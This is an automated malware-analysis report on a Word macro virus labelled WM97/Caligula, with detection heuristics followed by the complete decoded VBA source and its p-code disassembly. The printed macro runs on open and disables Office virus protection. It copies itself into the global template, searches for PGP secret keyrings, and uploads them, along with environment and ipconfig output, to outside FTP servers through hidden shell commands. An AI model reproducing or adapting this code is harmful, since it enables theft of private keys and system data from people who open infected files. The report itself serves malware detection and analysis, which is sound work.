MALICIOUS
358
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1041 Exfiltration Over C2 Channel
T1071.004 Exfiltration Over Application Layer Protocol: FTP
T1047 Windows Management Instrumentation
The sample contains a legacy WordBasic macro that utilizes the Shell() function to execute system commands like 'set' and 'ipconfig'. The output of these commands is intended to be uploaded to an FTP server at '160.63.96.71' using anonymous credentials. The macro also attempts to disable virus protection and self-delete, indicating a malicious intent to evade detection and exfiltrate data.
Heuristics 9
-
ClamAV: Doc.Trojan.Caligula-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Caligula-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "command.com /c ftp.exe -n -s:c:\cdbrk.vxd", vbHide -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Bare IPv4 address in VBA string literal (2 addresses) low OLE_VBA_BARE_IPV4_LITERALVBA source contains one or more globally-routable IPv4 addresses as plain string literals with no URL scheme. These are commonly C2 or download hosts that only get http:// prepended at runtime, so the normal URL extractors miss them. Surfaced as http://<ip> IOCs. Private, reserved and version/build-shaped values are excluded.
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://209.201.88.110 Referenced by macro
- http://160.63.96.71Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14911 bytes |
SHA-256: b668fee7c95cbf261e80de579b7eb012f6ba1425e59c81e2c0538c6cebf7f957 |
|||
|
Detection
ClamAV:
Doc.Trojan.Caligula-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Caligula"
Sub AutoOpen()
GoTo cnlabTest
On Error Resume Next
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Opic"
.Title = "WM97/Caligula Infection"
.Subject = "A Study In Espionage Enabled Viruses."
.Comments = "The Best Security Is Knowing The Other Guy Hasn't Got Any."
.Keywords = " | Caligula | Opic | CodeBreakers | "
.Execute
End With
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
CommandBars("tools").Controls("Macro").Enabled = False
CommandBars("tools").Controls("Customize...").Enabled = False
CommandBars("view").Controls("Toolbars").Enabled = False
CommandBars("view").Controls("Status Bar").Enabled = False
If NormalTemplate.VBProject.VBComponents.Item("Caligula").Name <> "Caligula" Then
NotInNorm = True
ActiveDocument.VBProject.VBComponents("Caligula").Export "c:\io.vxd"
Set Dobj = NormalTemplate.VBProject
ElseIf ActiveDocument.VBProject.VBComponents.Item("Caligula").Name <> "Caligula" Then
NotInActiv = True
NormalTemplate.VBProject.VBComponents("Caligula").Export "c:\io.vxd"
Set Dobj = ActiveDocument.VBProject
End If
If NotInNorm = True Or NotInActiv = True Then Dobj.VBComponents.Import ("c:\io.vxd")
If Day(Now) = 31 Then MsgBox "No cia," & vbCr & "No nsa," & vbCr & "No satellite," & vbCr & "Could map our veins.", 0, "WM97/Caligula (c) Opic [CodeBreakers 1998]"
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Caligula") = False) Then
pgppath = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command", "")
Position = InStr(1, pgppath, "pgpt")
If Position <> 0 Then
pgppath = Mid(pgppath, 1, Position - 2)
Else
GoTo noPGP
End If
With Application.FileSearch
.FileName = "\Secring.skr"
.LookIn = pgppath
.SearchSubFolders = True
.MatchTextExactly = True
.FileType = msoFileTypeAllFiles
.Execute
PGP_Sec_Key = .FoundFiles(1)
End With
Randomize
For i = 1 To 4
NewSecRingFile = NewSecRingFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
NewSecRingFile = "./secring" & NewSecRingFile & ".skr"
Open "c:\cdbrk.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "binary"
Print #1, "put """ & PGP_Sec_Key & """ """ & NewSecRingFile & """"
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\cdbrk.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Caligula") = True
End If
noPGP:
If NotInActiv = True Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
cnlabTest:
Rem
Rem ramdom file name generieren
Rem
Randomize
For i = 1 To 4
NewFile = NewFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
NewFile = "./test" & NewFile & ".txt"
Rem
Rem upload Daten generieren
Rem
Open "c:\cnlab.bat" For Output As #1
Print #1, "set > c:\cnlab.txt"
Print #1, "ipconfig >> c:\cnlab.txt"
Print #1, "ftp.exe -n -s:c:\cnlab.ftp"
Print #1, "del c:\cnlab.ftp c:\cnlab.txt"
Close #1
Open "c:\cnlab.ftp" For Output As #2
Print #2, "o 160.63.96.71"
Print #2, "user anonymous"
Print #2, "pass itsme@"
Print #2, "cd upload"
Print #2, "ascii"
Print #2, "put ""c:\cnlab.txt"" """ & NewFile & """"
Print #2, "quit"
Close #2
Rem
Rem ftp durchführen
Rem
Shell "command.com /c c:\cnlab.bat", vbHide
Rem
Rem aufräumen
Rem
' Shell "command.com /c del c:\cnlab.bat", vbHide
ActiveDocument.VBProject.VBComponents("Caligula").CodeModule.DeleteLines StartLine:=2, Count:=130
ActiveDocument.Save
End Sub
' Processing file: /tmp/qstore__1zxn0bb
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Caligula - 9802 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' Line #2:
' GoTo cnlabTest
' Line #3:
' Line #4:
' OnError (Resume Next)
' Line #5:
' Line #6:
' StartWithExpr
' Ld wdDialogFileSummaryInfo
' ArgsLd Dialogs 0x0001
' With
' Line #7:
' LitStr 0x0004 "Opic"
' MemStWith Author
' Line #8:
' LitStr 0x0017 "WM97/Caligula Infection"
' MemStWith Title
' Line #9:
' LitStr 0x0025 "A Study In Espionage Enabled Viruses."
' MemStWith Subject
' Line #10:
' LitStr 0x003A "The Best Security Is Knowing The Other Guy Hasn't Got Any."
' MemStWith Comments
' Line #11:
' LitStr 0x0024 " | Caligula | Opic | CodeBreakers | "
' MemStWith Keywords
' Line #12:
' ArgsMemCallWith Execute 0x0000
' Line #13:
' EndWith
' Line #14:
' Line #15:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #16:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #17:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #18:
' Line #19:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #20:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayStatusBar
' Line #21:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #22:
' Line #23:
' LitVarSpecial (False)
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #24:
' LitVarSpecial (False)
' LitStr 0x000C "Customize..."
' LitStr 0x0005 "tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #25:
' LitVarSpecial (False)
' LitStr 0x0008 "Toolbars"
' LitStr 0x0004 "view"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #26:
' LitVarSpecial (False)
' LitStr 0x000A "Status Bar"
' LitStr 0x0004 "view"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #27:
' Line #28:
' LitStr 0x0008 "Caligula"
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd New
' LitStr 0x0008 "Caligula"
' Ne
' IfBlock
' Line #29:
' LitVarSpecial (True)
' St NotInNorm
' Line #30:
' LitStr 0x0009 "c:\io.vxd"
' LitStr 0x0008 "Caligula"
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #31:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' Set Dobj
' Line #32:
' LitStr 0x0008 "Caligula"
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd New
' LitStr 0x0008 "Caligula"
' Ne
' ElseIfBlock
' Line #33:
' LitVarSpecial (True)
' St NotInActiv
' Line #34:
' LitStr 0x0009 "c:\io.vxd"
' LitStr 0x0008 "Caligula"
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #35:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' Set Dobj
' Line #36:
' EndIfBlock
' Line #37:
' Line #38:
' Ld NotInNorm
' LitVarSpecial (True)
' Eq
' Ld NotInActiv
' LitVarSpecial (True)
' Eq
' Or
' If
' BoSImplicit
' LitStr 0x0009 "c:\io.vxd"
' Paren
' Ld Dobj
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' EndIf
' Line #39:
' Line #40:
' Ld Now
' ArgsLd Day 0x0001
' LitDI2 0x001F
' Eq
' If
' BoSImplicit
' LitStr 0x0007 "No cia,"
' Ld vbCr
' Concat
' LitStr 0x0007 "No nsa,"
' Concat
' Ld vbCr
' Concat
' LitStr 0x000D "No satellite,"
' Concat
' Ld vbCr
' Concat
' LitStr 0x0014 "Could map our veins."
' Concat
' LitDI2 0x0000
' LitStr 0x002A "WM97/Caligula (c) Opic [CodeBreakers 1998]"
' ArgsCall MsgBox 0x0003
' EndIf
' Line #41:
' Line #42:
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info"
' LitStr 0x0008 "Caligula"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitVarSpecial (False)
' Eq
' Paren
' IfBlock
' Line #43:
' Line #44:
' LitStr 0x0000 ""
' LitStr 0x0037 "HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command"
' LitStr 0x0000 ""
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' St pgppath
' Line #45:
' LitDI2 0x0001
' Ld pgppath
' LitStr 0x0004 "pgpt"
' FnInStr3
' St Position
' Line #46:
' Line #47:
' Ld Position
' LitDI2 0x0000
' Ne
' IfBlock
' Line #48:
' Ld pgppath
' LitDI2 0x0001
' Ld Position
' LitDI2 0x0002
' Sub
' ArgsLd Mid$ 0x0003
' St pgppath
' Line #49:
' ElseBlock
' Line #50:
' GoTo noPGP
' Line #51:
' EndIfBlock
' Line #52:
' Line #53:
' StartWithExpr
' Ld Application
' MemLd FileSearch
' With
' Line #54:
' LitStr 0x000C "\Secring.skr"
' MemStWith FileName
' Line #55:
' Ld pgppath
' MemStWith LookIn
' Line #56:
' LitVarSpecial (True)
' MemStWith SearchSubFolders
' Line #57:
' LitVarSpecial (True)
' MemStWith MatchTextExactly
' Line #58:
' Ld msoFileTypeAllFiles
' MemStWith FileType
' Line #59:
' ArgsMemCallWith Execute 0x0000
' Line #60:
' LitDI2 0x0001
' ArgsMemLdWith FoundFiles 0x0001
' St PGP_Sec_Key
' Line #61:
' EndWith
' Line #62:
' Line #63:
' ArgsCall Read 0x0000
' Line #64:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0004
' For
' Line #65:
' Ld NewSecRingFile
' LitDI2 0x0008
' Ld Rnd
' Mul
' FnInt
' ArgsLd Str 0x0001
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Add
' St NewSecRingFile
' Line #66:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #67:
' LitStr 0x0009 "./secring"
' Ld NewSecRingFile
' Concat
' LitStr 0x0004 ".skr"
' Concat
' St NewSecRingFile
' Line #68:
' Line #69:
' LitStr 0x000C "c:\cdbrk.vxd"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #70:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0010 "o 209.201.88.110"
' PrintItemNL
' Line #71:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000E "user anonymous"
' PrintItemNL
' Line #72:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000B "pass itsme@"
' PrintItemNL
' Line #73:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000B "cd incoming"
' PrintItemNL
' Line #74:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0006 "binary"
' PrintItemNL
' Line #75:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0005 "put ""
' Ld PGP_Sec_Key
' Concat
' LitStr 0x0003 "" ""
' Concat
' Ld NewSecRingFile
' Concat
' LitStr 0x0001 """
' Concat
' PrintItemNL
' Line #76:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "quit"
' PrintItemNL
' Line #77:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #78:
' Line #79:
' LitStr 0x0029 "command.com /c ftp.exe -n -s:c:\cdbrk.vxd"
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #80:
' Line #81:
' LitVarSpecial (True)
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info"
' LitStr 0x0008 "Caligula"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #82:
' Line #83:
' EndIfBlock
' Line #84:
' Line #85:
' Label noPGP
' Line #86:
' Line #87:
' Ld NotInActiv
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' Ld ActiveDocument
' MemLd FullName
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed FileFormat
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0002
' EndIf
' Line #88:
' Line #89:
' Label cnlabTest
' Line #90:
' Line #91:
' Rem 0x0000 ""
' Line #92:
' Rem 0x001C " ramdom file name generieren"
' Line #93:
' Rem 0x0000 ""
' Line #94:
' ArgsCall Read 0x0000
' Line #95:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0004
' For
' Line #96:
' Ld NewFile
' LitDI2 0x0008
' Ld Rnd
' Mul
' FnInt
' ArgsLd Str 0x0001
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Add
' St NewFile
' Line #97:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #98:
' LitStr 0x0006 "./test"
' Ld NewFile
' Concat
' LitStr 0x0004 ".txt"
' Concat
' St NewFile
' Line #99:
' Line #100:
' Rem 0x0000 ""
' Line #101:
' Rem 0x0018 " upload Daten generieren"
' Line #102:
' Rem 0x0000 ""
' Line #103:
' LitStr 0x000C "c:\cnlab.bat"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #104:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0012 "set > c:\cnlab.txt"
' PrintItemNL
' Line #105:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0018 "ipconfig >> c:\cnlab.txt"
' PrintItemNL
' Line #106:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001A "ftp.exe -n -s:c:\cnlab.ftp"
' PrintItemNL
' Line #107:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001D "del c:\cnlab.ftp c:\cnlab.txt"
' PrintItemNL
' Line #108:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #109:
' Line #110:
' LitStr 0x000C "c:\cnlab.ftp"
' LitDI2 0x0002
' Sharp
' LitDefault
' Open (For Output)
' Line #111:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x000E "o 160.63.96.71"
' PrintItemNL
' Line #112:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x000E "user anonymous"
' PrintItemNL
' Line #113:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x000B "pass itsme@"
' PrintItemNL
' Line #114:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x0009 "cd upload"
' PrintItemNL
' Line #115:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x0005 "ascii"
' PrintItemNL
' Line #116:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x0014 "put "c:\cnlab.txt" ""
' Ld NewFile
' Concat
' LitStr 0x0001 """
' Concat
' PrintItemNL
' Line #117:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x0004 "quit"
' PrintItemNL
' Line #118:
' LitDI2 0x0002
' Sharp
' Close 0x0001
' Line #119:
' Line #120:
' Rem 0x0000 ""
' Line #121:
' Rem 0x0010 " ftp durchführen"
' Line #122:
' Rem 0x0000 ""
' Line #123:
' LitStr 0x001B "command.com /c c:\cnlab.bat"
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #124:
' Line #125:
' Rem 0x0000 ""
' Line #126:
' Rem 0x000A " aufräumen"
' Line #127:
' Rem 0x0000 ""
' Line #128:
' QuoteRem 0x0000 0x0030 " Shell "command.com /c del c:\cnlab.bat", vbHide"
' Line #129:
' LitDI2 0x0002
' ParamNamed StartLine
' LitDI2 0x0082
' ParamNamed Count
' LitStr 0x0008 "Caligula"
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #130:
' Line #131:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #132:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.